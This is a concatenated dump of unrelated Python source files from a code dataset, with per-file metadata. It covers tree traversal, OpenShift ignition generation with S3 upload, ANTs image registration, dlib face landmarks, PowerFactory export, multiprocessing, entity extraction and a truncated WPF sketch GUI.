BinaryTree(object):\n def __init__(self, root):\n self.root = Node(root)\n\n\n def print_tree(self, type='pre_order'):\n if type == 'pre_order':\n return (self.pre_order_traversal(self.root, ''))\n elif type == 'in_order':\n return (self.in_order_traversal(self.root, ''))\n elif type == 'post_order':\n return (self.post_order_traversal(self.root, ''))\n elif type == 'level_order':\n return (self.level_order_traversal(self.root, ''))\n else:\n return -1\n\n def pre_order_traversal(self, start, traversal):\n \"\"\"root->Left->right\"\"\"\n if start:\n traversal += ' ' + str(start.value)\n traversal = self.pre_order_traversal(start.left, traversal)\n traversal = self.pre_order_traversal(start.right, traversal)\n return traversal\n\n def in_order_traversal(self, start, traversal):\n \"\"\"Left->root->right\"\"\"\n if start:\n traversal = self.in_order_traversal(start.left, traversal)\n traversal += ' ' + str(start.value)\n traversal = self.in_order_traversal(start.right, traversal)\n return traversal\n\n def post_order_traversal(self, start, traversal):\n \"\"\"left->right->root\"\"\"\n if start:\n traversal = self.post_order_traversal(start.left, traversal)\n traversal = self.post_order_traversal(start.right, traversal)\n traversal += ' ' + str(start.value)\n return traversal\n\n\n def level_order_traversal(self, root, traversal):\n if root == None:\n return\n\n current_queue = deque()\n current_queue.append(root)\n current_queue.append(None)\n\n while len(current_queue) != 0:\n temp = current_queue.popleft()\n #print (str(temp.value) + \",\",)\n\n if temp.left != None:\n current_queue.append(temp.left)\n\n if temp.right != None:\n current_queue.append(temp.right)\n\n if current_queue[0] == None:\n print(current_queue.popleft())\n\n if len(current_queue) != 0:\n current_queue.append(None)\n\n\ntree = BinaryTree(7)\ntree.root.left = Node(3)\ntree.root.right = Node(15)\ntree.root.right.left = Node(9)\ntree.root.right.right = Node(20)\n\n\"\"\"\ntree = BinaryTree(3)\ntree.root.left = Node(9)\ntree.root.right = Node(8)\n\ntree.root.left.left = Node(4)\ntree.root.left.right = Node(1)\n\ntree.root.right.left = Node(0)\ntree.root.right.right = Node(7)\n\ntree.root.right.left.left = Node(5)\ntree.root.right.left.right = Node(2)\nr = tree.__repr__()\nprint(\"RE \",r)\n\"\"\"\n\"\"\"\nInput: [3,9,8,4,0,1,7,null,null,null,2,5] (0's right child is 2 and 1's left child is 5)\n\n 3\n /\\\n / \\\n 9 8\n /\\ /\\\n / \\/ \\\n 4 01 7\n /\\\n / \\\n 5 2\n\n\n[\n [4],\n [9,5],\n [3,0,1],\n [8,2],\n [7]\n]\n\"\"\"\nprint(tree.print_tree('pre_order'))\nprint(tree.print_tree('in_order'))\nprint(tree.print_tree('post_order'))\nprint(tree.print_tree('level_order'))\n\"\"\"\n100\n50\n25\n75\n200\n125\n300\n\n100\n50, 200\n25, 75, 350\n\n #pre-order - 100 50 25 75 200 125 300\n #in-order - 25 50 75 100 125 200 300\n #post-order - 25 75 50 125 300 200 100\n\"\"\"\n","sub_path":"miscellaneous/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"304866723","text":"#!/usr/bin/env python\n\nimport argparse\nimport json\nimport logging\nimport subprocess\nimport sys\nimport os\nimport boto3\nfrom botocore.exceptions import NoCredentialsError\n\n\ndef get_s3_client(s3_endpoint_url):\n aws_access_key_id = os.environ.get(\"aws_access_key_id\", \"accessKey1\")\n aws_secret_access_key = os.environ.get(\"aws_secret_access_key\", \"verySecretKey1\")\n\n s3_client = boto3.client(\n 's3',\n aws_access_key_id=aws_access_key_id,\n aws_secret_access_key=aws_secret_access_key,\n endpoint_url=s3_endpoint_url\n )\n return s3_client\n\n\ndef upload_to_aws(s3_client, local_file, bucket, s3_file):\n try:\n s3_client.upload_file(local_file, bucket, s3_file, ExtraArgs={'ACL': 'public-read'})\n print(\"Upload Successful\")\n return True\n except NoCredentialsError:\n print(\"Credentials not available\")\n return False\n\n\ndef remove_bmo_provisioning(ignition_file):\n found = False\n with open(ignition_file, \"r\") as file_obj:\n data = json.load(file_obj)\n storage_files = data['storage']['files']\n # Iterate through a copy of the list\n for file_data in storage_files[:]:\n if 'baremetal-provisioning-config' in file_data['path']:\n storage_files.remove(file_data)\n found = True\n break\n if found:\n with open(ignition_file, \"w\") as file_obj:\n json.dump(data, file_obj)\n\n\ndef upload_to_s3(s3_endpoint_url, bucket, install_dir):\n s3_client = get_s3_client(s3_endpoint_url)\n prefix = os.environ.get(\"CLUSTER_ID\")\n\n for root, _, files in os.walk(install_dir):\n for file_name in files:\n logging.info(\"Uploading file: %s\", file_name)\n file_path = os.path.join(root, file_name)\n if file_name == \"kubeconfig\":\n file_name = \"kubeconfig-noingress\"\n s3_file_name = \"{}/{}\".format(prefix, file_name)\n print(s3_file_name)\n upload_to_aws(s3_client, file_path, bucket, s3_file_name)\n\n\ndef debug_print_upload_to_s3(install_dir):\n prefix = \"dummy_cluster_id\"\n for root, _, files in os.walk(install_dir):\n for file_name in files:\n file_path = os.path.join(root, file_name)\n if file_name == \"kubeconfig\":\n file_name = \"kubeconfig-noingress\"\n s3_file_name = \"{}/{}\".format(prefix, file_name)\n print(\"Uploading file %s as object %s\" % (file_path, s3_file_name))\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Generate ignition manifest & kubeconfig')\n parser.add_argument('--s3_endpoint_url', help='s3 endpoint url', default=None)\n parser.add_argument('--s3_bucket', help='s3 bucket', default='test')\n args = parser.parse_args()\n\n work_dir = os.environ.get(\"WORK_DIR\")\n if not work_dir:\n raise Exception(\"working directory was not defined\")\n\n install_config = os.environ.get(\"INSTALLER_CONFIG\")\n config_dir = os.path.join(work_dir, \"installer_dir\")\n if install_config:\n subprocess.check_output([\"mkdir\", \"-p\", config_dir])\n with open(os.path.join(config_dir, 'install-config.yaml'), 'w+') as file_obj:\n file_obj.write(install_config)\n if not os.path.isdir(config_dir):\n raise Exception('installer directory is not mounted')\n\n if not os.path.isfile(os.path.join(config_dir, 'install-config.yaml')):\n raise Exception(\"install config file not located in installer dir\")\n\n command = \"OPENSHIFT_INSTALL_INVOKER=\\\"assisted-installer\\\" %s/openshift-install create ignition-configs --dir %s\" % (work_dir, config_dir)\n try:\n subprocess.check_output(command, shell=True, stderr=sys.stdout)\n except Exception as ex:\n raise Exception('Failed to generate files, exception: {}'.format(ex))\n\n try:\n remove_bmo_provisioning(\"%s/bootstrap.ign\" % config_dir)\n except Exception as ex:\n raise Exception('Failed to remove BMO prosioning configuration from bootstrap ignition, exception: {}'.format(ex))\n\n s3_endpoint_url = os.environ.get(\"S3_ENDPOINT_URL\", args.s3_endpoint_url)\n if s3_endpoint_url:\n bucket = os.environ.get('S3_BUCKET', args.s3_bucket)\n upload_to_s3(s3_endpoint_url, bucket, config_dir)\n else:\n # for debug purposes\n debug_print_upload_to_s3(config_dir)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"render_files.py","file_name":"render_files.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"226344748","text":"# -*- coding: utf-8 -*-\n# @Author: jose\n# @Date: 2019-01-27 17:34:53\n# @Last Modified by: jose\n# @Last Modified time: 2021-03-03 08:13:22\n\nimport os # os library, used to read files\nimport argparse # argument parser\n\nfrom folder_utils import *\n\ndef main():\n # Arguments details\n parser = argparse.ArgumentParser(description='Transform all dose images in a folder to a single reference image. \\\n Registration with ANTS library')\n parser.add_argument(\"reference\", type=str, \n help='Reference image file')\n parser.add_argument(\"dose_folder\", type=str, \n help='Dose folder with images')\n parser.add_argument(\"transform_folder\", type=str,\n help='Folder with computed transformations')\n parser.add_argument(\"output_folder\", type=str, \n help='Output folder with images')\n parser.add_argument('-d','--debug', action='store_true',\n help='Enable debug mode')\n parser.add_argument('-v','--verbose', action='store_true',\n help='Enable verbose mode')\n\n # Parse arguments\n args = parser.parse_args()\n dose_folder = args.dose_folder\n transform_folder = args.transform_folder\n output_folder = args.output_folder\n reference = args.reference\n\n # Files organized alphabetically\n dose_files = os.listdir(dose_folder)\n dose_files.sort()\n\n # Transforms organized\n transform_files = os.listdir(transform_folder)\n transform_files.sort()\n\n affine_prefix = ['_0Generic']\n dfield_prefix = ['_1Warp.nii.gz']\n affine_files = filter_folders_prefix(affine_prefix, transform_files)\n dfield_files = filter_folders_prefix(dfield_prefix, transform_files)\n\n # Remove reference dose if inside dose files\n numref = os.path.splitext(os.path.basename(reference))[0][-2:] # reference number\n indices = [i for i, s in enumerate(dose_files) if numref in s] # index where numref is in dose file\n for k in indices:\n dose_files.remove(dose_files[k])\n \n print('\\nRunning script to transform 3d images based in a reference.')\n if args.debug:\n print('[Debug Mode]')\n if args.verbose:\n print('\\nReference file: \\n' + str(fullpath_to_localpath([reference])) )\n print('\\nFiles found: \\n' + str(dose_files))\n print('\\nAffine transforms found: \\n' + str(affine_files))\n print('\\nField transforms found: \\n' + str(dfield_files))\n\n # assert(len(dfield_files) == len(affine_files) and len(dfield_files) == len(dose_files))\n \n\n # Create directory to save output\n output_path = os.path.join(output_folder,'warped_doses_ants/') # output path\n print('\\nCreate output folder:')\n os.system('echo mkdir -p ' + output_path ) # echo mkdir\n if not args.debug: \n os.system('mkdir -p ' + output_path ) # make directory\n\n\n print('\\nTransformations:')\n \n # Script loop\n c = 0\n k = 0\n while c < len(dose_files):\n # for k in range(len(dose_files)):\n num_img = 'dose' + str(k+1).zfill(2) # the files contain the word dose\n doses_to_process = [[i for i, s in enumerate(dose_files) if num_img in s]]\n # print(num_img)\n # print(doses_to_process)\n\n for d,j in enumerate (doses_to_process[0]):\n # Moving image path\n moving_image = os.path.join(dose_folder, dose_files[j])\n \n # Output file names\n out_prefix = '{}_to_{}.nrrd'.format(os.path.splitext(os.path.basename(dose_files[j]))[0], \n os.path.splitext(os.path.basename(reference))[0][-10:])\n output = os.path.join(output_path, out_prefix)\n\n\n affine_transform = os.path.join(transform_folder, affine_files[k])\n dfield_transform = os.path.join(transform_folder, dfield_files[k])\n\n cmd = 'antsApplyTransforms -d 3 \\\n -i {} -o {} -r {} -t {} -t {}'.format( moving_image, output , reference , dfield_transform, affine_transform )\n\n # Execute the command\n \n os.system('echo ' + cmd)\n if not args.debug:\n os.system(cmd) \n\n\n c += len(doses_to_process[0])\n k += 1\n print(k,c)\n\n '''\n\n \n '''\n return\n \n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","sub_path":"transform_referenced_ants.py","file_name":"transform_referenced_ants.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"215914584","text":"import cv2\nimport dlib\n\n#read img\nimg = cv2.imread(\"Face\\mc.jpg\")\n#conver img to grayscale:3D->2D\ngray = cv2.cvtColor(src=img,code=cv2.COLOR_BGR2GRAY)\n#dlib: Load Face Recognition Detector\nface_detector = dlib.get_frontal_face_detector()\n#load the predictor\npredictor = dlib.shape_predictor(\"Face\\shape_predictor_68_face_landmarks.dat\")\n#use detector to find face landmarks\nfaces = face_detector(gray)\nfor face in faces:\n x1 = face.left()\n y1 = face.top()\n x2 = face.right()\n y2 = face.bottom()\n #Draw a rectangle\n cv2.rectangle(img= img, pt1=(x1,y1), pt2=(x2,y2), color=(0,255,0), thickness=3)\n face_features = predictor(image=gray,box=face)\n\n #Loop through all 68 points\n for n in range(0, 68):\n x = face_features.part(n).x\n y = face_features.part(n).y\n cv2.circle(img=img, center=(x,y), radius=2, color=(0,0,255), thickness=2)\n#show img\ncv2.imshow(\"Face App\", img)\n#wait for key press to exit\ncv2.waitKey(delay=0)\n#close all windown\ncv2.destroyAllWindows","sub_path":"Face/face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"172589608","text":"# Imprime la palabra hola 10 veces\n\ncadena = 'hola mundo'\n\n# num = 1\n# mientras algo sea verdad -> realiza tal accion\n# while num <= 10:\n# print(cadena)\n# num = num + 1\n\n# ahora con FOR -> itera sobre colecciones de datos [listas, tuplas, conjuntos, diccionarios,etc]\nfor num in range(10):\n print(cadena)","sub_path":"Modulo2/scripts/repeticiones.py","file_name":"repeticiones.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"204503473","text":"import powerfactory # @UnresolvedImport @UnusedVariable\nimport json\nimport inspect\nimport os\nimport re\nimport pf2jsonUtils\n# fixme: Delete reload after development\nimport importlib\nimportlib.reload(pf2jsonUtils)\nfrom pf2jsonUtils import attributes4export, elements4export, nested_elements4export, reserved_keywords\n\n#################\n# Configuration #\n#################\n\nexported_grid_dir = \"../pfGridExport\"\nexported_grid_file = os.path.join(exported_grid_dir, \"pfGrid.json\")\n\n##########\n# Script #\n##########\n\ndef name_without_preamble(full_name):\n \"\"\"\n Remove name pollution by omitting uniform file path preamble\n \"\"\"\n match = re.search('(?<=Network Data\\.IntPrjfolder\\\\\\\\|Type Library\\.IntPrjfolder\\\\\\\\).*', full_name)\n return match.group() if match is not None else full_name\n\ndef safe_name(unsafe_str):\n if unsafe_str in reserved_keywords or unsafe_str.endswith('_'):\n return f\"{unsafe_str}_safe\" # only way to avoid auto generation of scala class adding backticks or similar\n return unsafe_str\n\ndef get_attribute_dict(raw_element, attributes_to_include, append_type=False):\n \"\"\"\n Creates a dict which includes all members/fields noted in included_fields of a given raw PowerFactory element.\n \"\"\"\n element = {\"id\": name_without_preamble(raw_element.GetFullName())}\n for member in inspect.getmembers(raw_element):\n if not (\n member[0].startswith('_')\n and inspect.ismethod(member[1])\n and isinstance(member[1], powerfactory.Method)\n and inspect.isclass(member[1])\n ) and member[0] in attributes_to_include:\n if not isinstance(member[1], powerfactory.DataObject):\n element[safe_name(member[0])] = member[1]\n elif isinstance(member[1], powerfactory.DataObject) and member[0] in nested_elements4export:\n element[safe_name(member[0])] = get_attribute_dicts([member[1]], attributes4export[member[0]])\n if append_type:\n element[\"pfCls\"] = raw_element.GetClassName()\n return element\n\n\ndef get_attribute_dicts(raw_elements, attributes_to_include):\n \"\"\"\n Creates a list with an attribute dictionary for each raw PowerFactory element\n \"\"\"\n elements = []\n pf_edges = [\"ElmLne\", \"ElmCoup\"]\n for raw_element in raw_elements:\n element = get_attribute_dict(raw_element, attributes_to_include)\n\n # export connected elements of nodes and transformers\n if (raw_element.GetClassName() in [\"ElmTerm\", \"ElmTr2\", \"ElmTr3\"]):\n element[\"conElms\"] = []\n for con_elm in raw_element.GetConnectedElements():\n element[\"conElms\"].append(get_attribute_dict(con_elm, attributes4export[\"conElms\"], True))\n\n # export ids of nodes the edges are connected to\n if (raw_element.GetClassName() in pf_edges):\n try:\n element[\"bus1Id\"] = name_without_preamble(raw_element.bus1.cterm.GetFullName())\n except Exception:\n element[\"bus1Id\"] = None\n try:\n element[\"bus2Id\"] = name_without_preamble(raw_element.bus2.cterm.GetFullName())\n except Exception:\n element[\"bus2Id\"] = None\n\n elements.append(element)\n return elements\n\n\ndpf = powerfactory.GetApplication()\ndpf.EchoOff()\nproject = dpf.GetActiveProject()\npfGrid = {} # resulting pf grid json export\n\n# get general settings\npfGrid.update({\"projectSettings\":\n [{\n \"unitSystem\": project.ilenunit,\n \"prefixPQS\": project.cspqexp,\n \"prefixLength\": project.clenexp\n }]\n})\n\n# generate json strings\nfor element_name in elements4export:\n pfGrid.update({element_name: get_attribute_dicts(dpf.GetCalcRelevantObjects(elements4export[element_name]),\n attributes4export[element_name])})\n\n# write\nif not os.path.exists(exported_grid_dir):\n os.makedirs(exported_grid_dir)\n\nwith open(exported_grid_file, 'w') as f:\n json.dump(pfGrid, f, indent= 2)","sub_path":"src/main/python/powerFactory2json/pf2json.py","file_name":"pf2json.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"534208526","text":"'''\nCreated on Sep 25, 2019\n15\n\nFor some reason, I couldn't find a general example of how to do this with Queue anywhere (even Python's doc examples don't spawn multiple processes), so here's what I got working after like 10 tries:\n\ndef add_helper(queue, arg1, arg2): # the func called in child processes\n ret = arg1 + arg2\n queue.put(ret)\n\ndef multi_add(): # spawns child processes\n q = Queue()\n processes = []\n rets = []\n for _ in range(0, 100):\n p = Process(target=add_helper, args=(q, 1, 2))\n processes.append(p)\n p.start()\n for p in processes:\n ret = q.get() # will block\n rets.append(ret)\n for p in processes:\n p.join()\n return rets\n\nQueue is a blocking, thread-safe queue that you can use to store the return values from the child processes. So you have to pass the queue to each process. Something less obvious here is that you have to get() from the queue before you join the Processes or else the queue fills up and blocks everything.\n@author: kyang\n'''\n\nimport multiprocessing\nfrom time import sleep\n\ndef worker(queue,i):\n \"\"\"worker function\"\"\"\n print('Worker '+str(i))\n sleep(6-i)\n queue.put('Worker '+str(i))\n\nif __name__ == '__main__':\n q = multiprocessing.JoinableQueue()\n outs = []\n for i in range(5):\n p = multiprocessing.Process(target=worker,args=(q,i,))\n p.start()\n #when the out\n q.join()\n for p in range(5):\n outs.append(q.get())\n #block\n print(str(outs))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"116355216","text":"import grpc\nimport time\nimport logging\n\nfrom aleph import settings\nfrom aleph.analyze.analyzer import EntityAnalyzer\nfrom aleph.model import DocumentTag\nfrom alephclient.services.entityextract_pb2_grpc import EntityExtractStub\nfrom alephclient.services.entityextract_pb2 import ExtractedEntity, Text\n\nlog = logging.getLogger(__name__)\nTYPE = ExtractedEntity.Type.Value\n\n\nclass EntityExtractor(EntityAnalyzer):\n MIN_LENGTH = 100\n TYPES = {\n TYPE('PERSON'): DocumentTag.TYPE_PERSON,\n TYPE('ORGANIZATION'): DocumentTag.TYPE_ORGANIZATION,\n TYPE('COMPANY'): DocumentTag.TYPE_ORGANIZATION,\n }\n\n def __init__(self):\n self.active = self.SERVICE is not None\n\n def get_service(self):\n cls = type(self)\n if not hasattr(cls, '_channel') or cls._channel is None:\n channel = grpc.insecure_channel(self.SERVICE)\n return EntityExtractStub(channel)\n\n def reset(self):\n cls = type(self)\n cls._channel = None\n\n def extract(self, collector, document):\n languages = list(document.languages)\n if not len(languages):\n languages = [settings.DEFAULT_LANGUAGE]\n\n for text in document.texts:\n if len(text) <= self.MIN_LENGTH:\n continue\n text = Text(text=text, languages=languages)\n try:\n service = self.get_service()\n for entity in service.Extract(text):\n type_ = self.TYPES.get(entity.type)\n if type_ is None:\n continue\n collector.emit(entity.label, type_)\n except Exception:\n log.exception('RPC call failed')\n self.reset()\n time.sleep(1)\n\n if len(collector):\n log.info('%s Extracted %s entities.', self.SERVICE, len(collector))\n\n\nclass PolyglotEntityExtractor(EntityExtractor):\n ORIGIN = 'polyglot'\n SERVICE = settings.POLYGLOT_SERVICE\n\n\nclass SpacyEntityExtractor(EntityExtractor):\n ORIGIN = 'spacy'\n SERVICE = settings.SPACY_SERVICE\n","sub_path":"aleph/analyze/extract_entity.py","file_name":"extract_entity.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"423252617","text":"import clr\r\nimport sys\r\nimport os\r\nimport threading\r\nimport Queue\r\n\r\nclr.AddReference('PresentationCore')\r\nclr.AddReference('PresentationFramework')\r\nclr.AddReference('Microsoft.Scripting')\r\nclr.AddReference('Microsoft.Dynamic')\r\nclr.AddReference('Microsoft.Ink')\r\n#clr.AddReference('Microsoft.Win32')\r\nclr.AddReference('System.Drawing')\r\nclr.LoadAssemblyFromFile('WPFFrameworkElementExtension.dll')\r\n\r\nclr.AddReference('WPFFrameworkElementExtension')\r\n\r\n\r\nfrom System.Windows.Markup import XamlReader\r\nfrom System.Windows import Application, FlowDirection\r\nfrom System.IO import FileStream, FileMode\r\nfrom System.Windows.Controls import InkCanvas, TextBlock, UIElementCollection, InkCanvasEditingMode\r\nfrom System.Windows.Media import Brushes, SolidColorBrush, Color, FormattedText, Typeface\r\nfrom System.Windows.Shapes import Ellipse, Line\r\nfrom System.Windows.Input import StylusPoint, StylusPointCollection\r\nfrom System.Windows.Ink import Stroke as MSStroke, StylusTip\r\nfrom System.Globalization import CultureInfo\r\nfrom Microsoft.Win32 import OpenFileDialog\r\n\r\n\r\n\r\nfrom Utils import GeomUtils #Import GeomUtils first. Just do it. Lest Point won't load when being loaded through Board. Still can't figure out root cause, guessing something with Circular dependencies?\r\nfrom Utils import Logger\r\n\r\nfrom SketchSystem import initialize\r\nfrom SketchFramework.Stroke import Stroke\r\nfrom SketchFramework.Point import Point\r\nfrom SketchFramework.Board import BoardSingleton\r\nfrom MSRecognizers import MSAxesObserver\r\nimport SketchGUI\r\nfrom SketchGUI import _SketchGUI\r\nfrom SketchGUI import SketchGUISingleton\r\n\r\n########################################\r\n#Some globals for sanity, set in initialization code\r\n#print SketchGUI.globals()\r\nlogger = Logger.getLogger('WPFSketchGUI', Logger.WARN )\r\n\r\n\r\ndef recordEvent(event, filename=\"playback.txt\"):\r\n mode = \"a\"\r\n fp = open(filename, mode)\r\n print >> fp, \"#%s\" % (event)\r\n fp.close()\r\n\r\ndef recordStroke(stroke, id, filename = \"playback.txt\"):\r\n saveStrokes([stroke], filename=filename, overwrite=False, id=id)\r\n\r\ndef recordStrokeErase( id, filename = \"playback.txt\"):\r\n mode = \"a\"\r\n fp = open(filename, mode)\r\n print >> fp, \"#Remove %s\" % (id)\r\n fp.close()\r\n\r\n\r\n \r\nclass _WpfSketchGUI(_SketchGUI):\r\n #HEIGHT = _SketchGUI.HEIGHT\r\n Singleton = None\r\n StrokeCount = 0\r\n def __init__(self, wpfCanvas, backCanvas = None):\r\n \r\n \r\n self.Board = BoardSingleton(reset = True)\r\n initialize(self.Board)\r\n self.Canvas = wpfCanvas\r\n self.BackCanvas = backCanvas\r\n self.StrokeMap = {}\r\n self.StrokeOrderList = []\r\n self.StrokeIDMap = {}\r\n self.RestoreStrokes = loadStrokes(filename=\"Restorefile.txt\")\r\n self._inking = True\r\n self._lineStrokes = {}\r\n self._removeStrokes = []\r\n\r\n\r\n try:\r\n os.remove(\"Restorefile.txt\")\r\n except:\r\n pass\r\n try:\r\n os.remove(\"playback.txt\")\r\n except:\r\n pass\r\n self.Singleton = self\r\n _WpfSketchGUI.Singleton = self\r\n _SketchGUI.Singleton = self\r\n \r\n \r\n def InkCanvas_StrokeCollected( self, sender, e ): #e is a InkCanvasStrokeCollectedEventArgs \r\n pointList = []\r\n #Transform the Canvas's Points into our Points\r\n for stylusPoint in e.Stroke.StylusPoints:\r\n px, py = transformBoard_Wpf(stylusPoint.X, stylusPoint.Y, _WpfSketchGUI.HEIGHT)\r\n pointList.append( Point( px, py ) ) \r\n newStroke = Stroke( pointList )\r\n self.StrokeMap[e.Stroke] = newStroke\r\n self.StrokeOrderList.append(newStroke)\r\n \r\n #try:\r\n self.Board.AddStroke( newStroke )\r\n strokeId = _WpfSketchGUI.StrokeCount\r\n _WpfSketchGUI.StrokeCount += 1\r\n\r\n self.StrokeIDMap[newStroke] = strokeId\r\n recordStroke(newStroke, strokeId) \r\n #except Exception as exc:\r\n # logger.error(\"**********ADD STROKE ERROR ********\\n %s\" % (exc))\r\n self.Redraw()\r\n #SketchGUISingleton().drawText(100,100, InText=rec_text(self.StrokeOrderList))\r\n saveStrokes(self.Board.Strokes, filename=\"Restorefile.txt\", overwrite = True)\r\n\r\n def InkCanvas_StrokeErasing(self, sender, e):\r\n self._removeStrokes.append(e.Stroke)\r\n \"\"\"\r\n board_stroke = self.StrokeMap.pop(e.Stroke, None)\r\n if board_stroke is not None: #Stroke is user-drawn\r\n strokeID = self.StrokeIDMap.get(board_stroke, \"\")\r\n recordStrokeErase(strokeID)\r\n #self.StrokeOrderList.remove(board_stroke)\r\n self.Board.RemoveStroke(board_stroke)\r\n self.Redraw()\r\n \"\"\"\r\n def InkCanvas_MouseLeftButtonUp(self, sender, e):\r\n if self.Canvas.EditingMode == InkCanvasEditingMode.EraseByStroke:\r\n self.Canvas.EditingMode = InkCanvasEditingMode.Ink\r\n self.Canvas.Background = SolidColorBrush( color_from_hex(\"#FFFFFF\"))\r\n for removedStroke in self._removeStrokes:\r\n board_stroke = self.StrokeMap.pop(removedStroke, None)\r\n if board_stroke is not None: #Stroke is user-drawn\r\n strokeID = self.StrokeIDMap.get(board_stroke, \"\")\r\n recordStrokeErase(strokeID)\r\n #self.StrokeOrderList.remove(board_stroke)\r\n self.Board.RemoveStroke(board_stroke)\r\n self._removeStrokes = []\r\n self.Redraw()\r\n\r\n def SaveStrokesClicked(self, sender, e):\r\n recordEvent(\"SaveStrokes\")\r\n saveStrokes(self.Board.Strokes, overwrite = True)\r\n \r\n def ChooseFileClicked(self, sender, e):\r\n fd = OpenFileDialog()\r\n fd.Filter = \"Comma Separated Value|*.csv|All Files|*.*\"\r\n if (fd.ShowDialog()):\r\n MSAxesObserver.SETDATAFILE(fd.FileName)\r\n print( \"Open file %s\" % (fd.FileName) )\r\n recordEvent(\"Open %s\" % (fd.FileName))\r\n\r\n self.ResetBoard()\r\n def LoadStrokesClicked(self, sender, e):\r\n for stroke in loadStrokes():\r\n #self.StrokeMap[stroke] = None\r\n self.StrokeOrderList.append(stroke)\r\n self.Board.AddStroke( stroke )\r\n saveStrokes([stroke], filename=\"Restorefile.txt\", overwrite = False)\r\n recordEvent(\"LoadStrokes\")\r\n\r\n self.Redraw()\r\n \r\n def RestoreClicked(self, sender, e):\r\n for stroke in self.RestoreStrokes:\r\n self.StrokeOrderList.append(stroke)\r\n self.Board.AddStroke( stroke )\r\n recordEvent(\"Restored\")\r\n self.Redraw()\r\n \r\n def ResetBoard(self, *args, **kargs):\r\n recordEvent(\"ResetBoard\")\r\n \r\n self.Clear()\r\n self.Board.Reset()\r\n self.StrokeOrderList = []\r\n initialize(self.Board)\r\n \r\n def Clear(self, *args, **kargs):\r\n self._lineStrokes = {}\r\n self.StrokeMap = {}\r\n for elem in list(self.BackCanvas.Children):\r\n if elem is not self.Canvas:\r\n self.BackCanvas.Children.Remove(elem)\r\n for stk in list(self.Canvas.Strokes):\r\n self.Canvas.Strokes.Remove(stk)\r\n \r\n def ToggleCursorEraser(self, sender, e):\r\n if self.Canvas.EditingMode == InkCanvasEditingMode.EraseByStroke:\r\n self.Canvas.EditingMode = InkCanvasEditingMode.Ink\r\n self.Canvas.Background = SolidColorBrush( color_from_hex(\"#FFFFFF\"))\r\n else:\r\n self.Canvas.EditingMode = InkCanvasEditingMode.EraseByStroke\r\n self.Canvas.Background = SolidColorBrush( color_from_hex(\"#F8ACAC\"))\r\n \r\n\r\n \r\n def Redraw(self):\r\n \"Find all the strokes on the board, draw them, then iterate through every object and have it draw itself\"\r\n global HEIGHT, WIDTH\r\n self.Clear()\r\n \r\n \r\n strokes = self.Board.Strokes\r\n observers = self.Board.BoardObservers\r\n \r\n #try:\r\n for obs in observers:\r\n obs.drawMyself()\r\n \r\n for s in strokes:\r\n s.drawMyself()\r\n #except Exception as exc:\r\n # logger.error(\"************ REDRAW ERROR **************\\n%s\" % (exc) )\r\n \r\n \r\n \r\n def drawCircle(self, x, y, radius=1, color=\"#000000\", fill=\"\", width=1.0):\r\n \"Draw a circle on the canvas at (x,y) with radius rad. Color should be 24 bit RGB string #RRGGBB. Empty string is transparent\"\r\n #x,y = transformBoard_Wpf(x,y,height = HEIGHT)\r\n el = Ellipse()\r\n el.Width = radius * 2\r\n el.Height = radius * 2\r\n el.Stroke = SolidColorBrush(color_from_hex(color))\r\n el.StrokeThickness = width\r\n el.IsHitTestVisible = False\r\n self.BackCanvas.SetBottom(el, y - radius)\r\n self.BackCanvas.SetLeft(el, x - radius)\r\n# el.SetValue(InkCanvas.LeftProperty, x - radius)\r\n# el.SetValue(InkCanvas.TopProperty, y - radius)\r\n\r\n self.BackCanvas.Children.Add(el)\r\n\r\n def drawLine(self, x1, y1, x2, y2, width=2, color=\"#000000\"):\r\n \"Draw a line on the canvas from (x1,y1) to (x2,y2). Color should be 24 bit RGB string #RRGGBB\"\r\n global HEIGHT\r\n x1, y1 = transformBoard_Wpf(x1, y1, height = _WpfSketchGUI.HEIGHT)\r\n x2, y2 = transformBoard_Wpf(x2, y2, height = _WpfSketchGUI.HEIGHT)\r\n\r\n line = Line()\r\n line.Stroke = SolidColorBrush(color_from_hex(color))\r\n line.StrokeThickness = width\r\n line.IsHitTestVisible = False\r\n line.X1 = x1\r\n line.X2 = x2\r\n line.Y1 = y1\r\n line.Y2 = y2\r\n self.BackCanvas.Children.Add(line)\r\n\r\n #self.Canvas.Background = Brushes.LightGreen\r\n \r\n def drawText (self, x, y, InText=\"\", size=10, color=\"#000000\"):\r\n \"Draw some text (InText) on the canvas at (x,y). Color as defined by 24 bit RGB string #RRGGBB\"\r\n #x,y = transformBoard_Wpf(x,y,height = HEIGHT)\r\n text = TextBlock()\r\n text.Text = InText\r\n text.FontSize = size\r\n text.Foreground = SolidColorBrush(color_from_hex(color))\r\n text.IsHitTestVisible = False\r\n \r\n \r\n self.BackCanvas.SetBottom(text, y)\r\n self.BackCanvas.SetLeft(text, x)\r\n self.BackCanvas.Children.Add(text)\r\n \r\n def drawStroke(self, stroke, width = 2, color = \"#000000\", erasable = False):\r\n if erasable:\r\n spc = StylusPointCollection()\r\n for point in stroke.Points:\r\n x, y = transformBoard_Wpf(point.X, point.Y, height = _WpfSketchGUI.HEIGHT)\r\n s_point = StylusPoint(x, y)\r\n spc.Add(s_point)\r\n ms_stroke = MSStroke(spc)\r\n if stroke in self.Board.Strokes:\r\n self.StrokeMap[ms_stroke] = stroke\r\n 